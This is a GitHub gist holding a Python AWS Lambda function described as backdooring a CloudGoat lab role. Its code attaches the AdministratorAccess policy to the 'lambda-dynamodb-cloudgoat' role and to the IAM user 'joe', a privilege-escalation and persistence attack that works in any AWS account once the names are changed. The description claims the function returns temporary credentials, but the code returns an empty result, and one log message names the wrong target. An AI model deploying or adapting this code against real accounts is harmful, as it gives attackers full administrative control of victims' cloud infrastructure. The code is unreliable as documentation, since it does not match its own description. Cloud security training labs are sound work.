Last active
June 4, 2019 05:18
-
-
Save mgeeky/62c5882a6314cc72ba6382f53ffcc5bf to your computer and use it in GitHub Desktop.
Lambda that backdoors CloudGoat's lambda-dynamodb-cloudgoat role by granting it an AdministratorAccess managed role. As soon as this Lambda gets invoked by HTTP event - it will return temporary AWS session credentials.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import boto3 | |
| import json | |
| POLICIES_TO_ATTACH = [ | |
| 'arn:aws:iam::aws:policy/AdministratorAccess', | |
| ] | |
| ROLE_TO_BACKDOOR = 'lambda-dynamodb-cloudgoat' | |
| USER_TO_BACKDOOR = 'joe' | |
| def endpoint(event, context): | |
| iam = boto3.client('iam') | |
| resp = {} | |
| try: | |
| for pol in POLICIES_TO_ATTACH: | |
| iam.attach_role_policy( | |
| RoleName = ROLE_TO_BACKDOOR, | |
| PolicyArn = pol | |
| ) | |
| print('[+] Attached policy ({}) to role ({})'.format(pol, ROLE_TO_BACKDOOR)) | |
| except Exception as e: | |
| print('[!] Backdooring role failed: "{}"'.format(str(e))) | |
| try: | |
| for pol in POLICIES_TO_ATTACH: | |
| iam.attach_user_policy( | |
| UserName = USER_TO_BACKDOOR, | |
| PolicyArn = pol | |
| ) | |
| print('[+] Attached policy ({}) to role ({})'.format(pol, ROLE_TO_BACKDOOR)) | |
| except Exception as e: | |
| print('[!] Backdooring user failed: "{}"'.format(str(e))) | |
| return resp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment